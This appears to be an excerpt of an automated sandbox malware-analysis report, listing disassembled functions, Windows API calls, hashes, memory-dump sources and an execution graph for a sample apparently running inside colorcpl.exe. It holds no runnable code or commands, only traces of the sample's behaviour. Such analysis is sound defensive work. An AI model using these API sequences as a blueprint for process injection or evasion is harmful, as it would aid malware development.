                                                                                                                                          • Instruction Fuzzy Hash: D6D012B23903506DBE0872F41CD481903CC9D5492D3240F20B122DB4A2FFA788155018
                                                                                                                                          Function 02A9C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,02ABD10B,00000000,02ABD11E), ref: 02A9C47A
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02A9C48B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                          • Opcode ID: fc2017666d9b972e69602f7c6890745c95dba04883f27d8e24d2507af3f2fab3
                                                                                                                                          • Instruction ID: 7aa2e1cf2aafdea53dbe51f4fc4049a52164c1175fc5c096a67654f6b6b5721d
                                                                                                                                          • Opcode Fuzzy Hash: fc2017666d9b972e69602f7c6890745c95dba04883f27d8e24d2507af3f2fab3
                                                                                                                                          • Instruction Fuzzy Hash: 76D05EF0BC0F046AEF01ABF359C867523DE97ADB20B408827E50155112EF6A9450CF14
                                                                                                                                          Function 02A9E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A9E297
                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A9E2B3
                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A9E32A
                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02A9E353
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                          • Instruction ID: 919dc188e14f7bd9d293528f5202b20d325a3856e08cbabf299362d5a60e387f
                                                                                                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                          • Instruction Fuzzy Hash: F6410A75A416299FCF62DB5ACE90BC9B3FDAF49314F0045D6E548A7212DE30AF808F50
                                                                                                                                          Function 02A9AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A9AD59
                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A9AD7D
                                                                                                                                          • GetModuleFileNameA.KERNEL32(02A90000,?,00000105), ref: 02A9AD98
                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A9AE2E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                          • Opcode ID: c1fb3c4163dc02dfe3e7701872fed22fcedfe1482fa7a40193b454067f71d285
                                                                                                                                          • Instruction ID: 6a27ca73ae04123f1037bbac05eb836590423132cd655b60996bfd9d65812f05
                                                                                                                                          • Opcode Fuzzy Hash: c1fb3c4163dc02dfe3e7701872fed22fcedfe1482fa7a40193b454067f71d285
                                                                                                                                          • Instruction Fuzzy Hash: 93410771A402689FDF21DB6ACD84BDAB7FDAF08304F4440E6A548E7242DB74AF848F50
                                                                                                                                          Function 02A9AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A9AD59
                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A9AD7D
                                                                                                                                          • GetModuleFileNameA.KERNEL32(02A90000,?,00000105), ref: 02A9AD98
                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A9AE2E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                          • Opcode ID: afbded3e99b0526a001f7497c495599bc3681550364b74259a61ce5cdccea6e1
                                                                                                                                          • Instruction ID: 52d7e1d929535e72249954a6cf2d543176727b78173c4980f92ee8392ebfc378
                                                                                                                                          • Opcode Fuzzy Hash: afbded3e99b0526a001f7497c495599bc3681550364b74259a61ce5cdccea6e1
                                                                                                                                          • Instruction Fuzzy Hash: 5D410871A402689FDF21DB6ACD84BDAB7FDAB08304F4444E6A548E7242DF749F848F50
                                                                                                                                          Function 02A91C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9e49426f1b2c701fd6dc36a3c25877505b3cdad752e3b59f4b79fba358206285
                                                                                                                                          • Instruction ID: 2bdd4ea7f09a28625834832316b3e26e23ff692baa47dce1fd52ba25f5b314c8
                                                                                                                                          • Opcode Fuzzy Hash: 9e49426f1b2c701fd6dc36a3c25877505b3cdad752e3b59f4b79fba358206285
                                                                                                                                          • Instruction Fuzzy Hash: ADA102B67502060BDF19AB7E9DC03BDB2D69BC5325F18427EE11DCB381EF6889428690
                                                                                                                                          Function 02A994EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02A995DA), ref: 02A99572
                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02A995DA), ref: 02A99578
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                          • String ID: yyyy
                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                          • Opcode ID: 9297a9df7aff5ed7f2a0ed98d577ebcd248934187878494a6e39a8c6ba53adb4
                                                                                                                                          • Instruction ID: 0677a2be54e1e7eecf39a10c944839c2c28c76e2270f7fb697c43b9b51b27fd4
                                                                                                                                          • Opcode Fuzzy Hash: 9297a9df7aff5ed7f2a0ed98d577ebcd248934187878494a6e39a8c6ba53adb4
                                                                                                                                          • Instruction Fuzzy Hash: 12216071A40258AFDF10DFAAC981AAFB3F9EF09700F4100A9E905E7250DF309E44CB65
                                                                                                                                          Function 02AA8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                                                                          • API String ID: 3811539418-184458249
                                                                                                                                          • Opcode ID: 4ebc50e4de1c82ae64f91d6942ff574faff18bef7765a20e4a8e8b86efe56caf
                                                                                                                                          • Instruction ID: 84802fb7d05e61e409099dbc75d5d70dd141c140420f267e5006ea093b76507f
                                                                                                                                          • Opcode Fuzzy Hash: 4ebc50e4de1c82ae64f91d6942ff574faff18bef7765a20e4a8e8b86efe56caf
                                                                                                                                          • Instruction Fuzzy Hash: 8501AD716C0304BFEB01EFA5ED11F5AB7EDEB08B00FA084A0B901D7200CF38AD119A24
                                                                                                                                          Function 02A96498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocValue
                                                                                                                                          • String ID: Hvm
                                                                                                                                          • API String ID: 1189806713-3417229055
                                                                                                                                          • Opcode ID: 0c70f92eb878edcfbf839460d539ce1f4115945ebf84e78b265a4dd99e7097e0
                                                                                                                                          • Instruction ID: 56412c0997736b89892dae23067d59f9988d46d0383855b944fce4efc7dfb44f
                                                                                                                                          • Opcode Fuzzy Hash: 0c70f92eb878edcfbf839460d539ce1f4115945ebf84e78b265a4dd99e7097e0
                                                                                                                                          • Instruction Fuzzy Hash: 09C01270D8034086DF00BBF393446453ADD9F81F84B8049116500C714DDF38C011CF51
                                                                                                                                          Function 02AAAF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAAF58
                                                                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 02AAAF88
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 02AAAFA7
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAAFB3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Read$Write
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3448952669-0
                                                                                                                                          • Opcode ID: 0842f42538510887f6bc99ff4f81f5882a90e14e8419f97fd24a7733c12119fe
                                                                                                                                          • Instruction ID: 2185ed56350e596a8b6838e48d3d8a7b321be9bd995f729b2161681522e71cc4
                                                                                                                                          • Opcode Fuzzy Hash: 0842f42538510887f6bc99ff4f81f5882a90e14e8419f97fd24a7733c12119fe
                                                                                                                                          • Instruction Fuzzy Hash: FB2190B264061A9BDF15DF6ACDC0BAE73F9EF40711F008512FE1497281DB39E811CAA0

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:1%
                                                                                                                                          Dynamic/Decrypted Code Coverage:6.1%
                                                                                                                                          Signature Coverage:0.9%
                                                                                                                                          Total number of Nodes:114
                                                                                                                                          Total number of Limit Nodes:8
                                                                                                                                          execution_graph 95247 6614723 95248 661473f 95247->95248 95249 6614767 95248->95249 95250 661477b 95248->95250 95251 661c3c3 NtClose 95249->95251 95257 661c3c3 95250->95257 95253 6614770 95251->95253 95254 6614784 95260 661e583 RtlAllocateHeap 95254->95260 95256 661478f 95258 661c3e0 95257->95258 95259 661c3f1 NtClose 95258->95259 95259->95254 95260->95256 95261 65f1a0d 95262 65f1a1f 95261->95262 95265 661faf3 95262->95265 95268 661e033 95265->95268 95269 661e056 95268->95269 95280 65f70c3 95269->95280 95271 661e06c 95272 65f1a6d 95271->95272 95283 660ae13 95271->95283 95274 661e08b 95275 661e0a0 95274->95275 95298 661c783 95274->95298 95294 6618053 95275->95294 95278 661e0ba 95279 661c783 ExitProcess 95278->95279 95279->95272 95301 66061a3 95280->95301 95282 65f70d0 95282->95271 95284 660ae3f 95283->95284 95325 660ad03 95284->95325 95287 660ae84 95289 660aea0 95287->95289 95292 661c3c3 NtClose 95287->95292 95288 660ae6c 95290 660ae77 95288->95290 95291 661c3c3 NtClose 95288->95291 95289->95274 95290->95274 95291->95290 95293 660ae96 95292->95293 95293->95274 95295 66180b5 95294->95295 95296 66180c2 95295->95296 95336 6608353 95295->95336 95296->95278 95299 661c7a0 95298->95299 95300 661c7b1 ExitProcess 95299->95300 95300->95275 95302 66061c0 95301->95302 95304 66061d6 95302->95304 95305 661ce03 95302->95305 95304->95282 95307 661ce1d 95305->95307 95306 661ce4c 95306->95304 95307->95306 95312 661b9d3 95307->95312 95313 661b9ed 95312->95313 95319 22762c0a 95313->95319 95314 661ba19 95316 661e463 95314->95316 95322 661c733 95316->95322 95318 661cec5 95318->95304 95320 22762c11 95319->95320 95321 22762c1f LdrInitializeThunk 95319->95321 95320->95314 95321->95314 95323 661c74d 95322->95323 95324 661c75e RtlFreeHeap 95323->95324 95324->95318 95326 660ad1d 95325->95326 95330 660adf9 95325->95330 95331 661ba73 95326->95331 95329 661c3c3 NtClose 95329->95330 95330->95287 95330->95288 95332 661ba90 95331->95332 95335 227635c0 LdrInitializeThunk 95332->95335 95333 660aded 95333->95329 95335->95333 95337 6608368 95336->95337 95343 660888b 95337->95343 95344 66039a3 95337->95344 95339 66084aa 95340 661e463 RtlFreeHeap 95339->95340 95339->95343 95341 66084c2 95340->95341 95342 661c783 ExitProcess 95341->95342 95341->95343 95342->95343 95343->95296 95348 66039c3 95344->95348 95346 6603a2c 95346->95339 95347 6603a22 95347->95339 95348->95346 95349 660b123 RtlFreeHeap LdrInitializeThunk 95348->95349 95349->95347 95351 661e543 95354 661c6e3 95351->95354 95353 661e55b 95355 661c6fd 95354->95355 95356 661c70e RtlAllocateHeap 95355->95356 95356->95353 95357 6614ac3 95359 6614adc 95357->95359 95358 6614b27 95360 661e463 RtlFreeHeap 95358->95360 95359->95358 95362 6614b67 95359->95362 95364 6614b6c 95359->95364 95361 6614b37 95360->95361 95363 661e463 RtlFreeHeap 95362->95363 95363->95364 95365 661b983 95366 661b99d 95365->95366 95369 22762df0 LdrInitializeThunk 95366->95369 95367 661b9c5 95369->95367 95370 661f683 95371 661e463 RtlFreeHeap 95370->95371 95372 661f698 95371->95372 95373 660b003 95375 660b047 95373->95375 95374 660b068 95375->95374 95376 661c3c3 NtClose 95375->95376 95376->95374 95377 66037c3 95380 661c653 95377->95380 95381 661c66d 95380->95381 95384 22762c70 LdrInitializeThunk 95381->95384 95382 66037e5 95384->95382 95350 22762b60 LdrInitializeThunk 95385 6608ac6 95386 6608a96 95385->95386 95387 661c3c3 NtClose 95386->95387 95389 6608ad2 95386->95389 95388 6608ab2 95387->95388 95390 6603d8e PostThreadMessageW 95391 6603da0 95390->95391

                                                                                                                                          Executed Functions

                                                                                                                                          Function 0661C3C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 10 661c3c3-661c3ff call 65f4423 call 661d5f3 NtClose
                                                                                                                                          APIs
                                                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0661C3FA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                          • Opcode ID: 19b34c64f8f0b83ddca18d7921711965a4fff30c493853e6ca59396d6616b617
                                                                                                                                          • Instruction ID: 247b5abb598c55568cc97f43636432c0c948cdb4f3b5c3f9a4c064712b2e2c98
                                                                                                                                          • Opcode Fuzzy Hash: 19b34c64f8f0b83ddca18d7921711965a4fff30c493853e6ca59396d6616b617
                                                                                                                                          • Instruction Fuzzy Hash: 41E04F326002047BD6A0AE69DC00FDB77ACDFC5714F404015FA18AB142C671B90187A0
                                                                                                                                          Function 22762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 27 22762b60-22762b6c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 4c34617f80672e5e302a7b7aaef248d35670719c16a083b4df826bd2360d1ea8
                                                                                                                                          • Instruction ID: 1e7606c39a998d0c8d52f3dc7603b6d51c1f107310e3da045f230ed97533b1e5
                                                                                                                                          • Opcode Fuzzy Hash: 4c34617f80672e5e302a7b7aaef248d35670719c16a083b4df826bd2360d1ea8
                                                                                                                                          • Instruction Fuzzy Hash: 3090026120660003450571588454626401A47E0201B97C031E1014560DC52589917129
                                                                                                                                          Function 22762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 28 22762c70-22762c7c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: bc160332274bf62f704d71d61ef0ed19e7c5c1134f3a4af57b533b5ae338d13a
                                                                                                                                          • Instruction ID: 08a6bb61d98bf7b1891c4e208a7dacf0d6ccc2c17a923621368bedec87b4ee15
                                                                                                                                          • Opcode Fuzzy Hash: bc160332274bf62f704d71d61ef0ed19e7c5c1134f3a4af57b533b5ae338d13a
                                                                                                                                          • Instruction Fuzzy Hash: D290023120568802D5107158C44475A001547D0301F9BC421A4424628D869589917125
                                                                                                                                          Function 22762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 29 22762df0-22762dfc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 28d5d09e19cd06577b87c0d7c40063f59bc054fd19a25493ad846bcb1d0d03f4
                                                                                                                                          • Instruction ID: 9b4569f6abf340608ff6260de680bec00f110c1ab194e5527d0e59f73050b4a4
                                                                                                                                          • Opcode Fuzzy Hash: 28d5d09e19cd06577b87c0d7c40063f59bc054fd19a25493ad846bcb1d0d03f4
                                                                                                                                          • Instruction Fuzzy Hash: 9F90023120560413D51171588544717001947D0241FD7C422A0424528D96568A52B125
                                                                                                                                          Function 227635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 30 227635c0-227635cc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: b945781d77c0dfaeafae141e8e788e5a074fa52d96c640e6cb373690985c9ec7
                                                                                                                                          • Instruction ID: 92fe97548a3e60d41feaf10c8c2ff2fff48d14f65edde5a35fac8c89676e087e
                                                                                                                                          • Opcode Fuzzy Hash: b945781d77c0dfaeafae141e8e788e5a074fa52d96c640e6cb373690985c9ec7
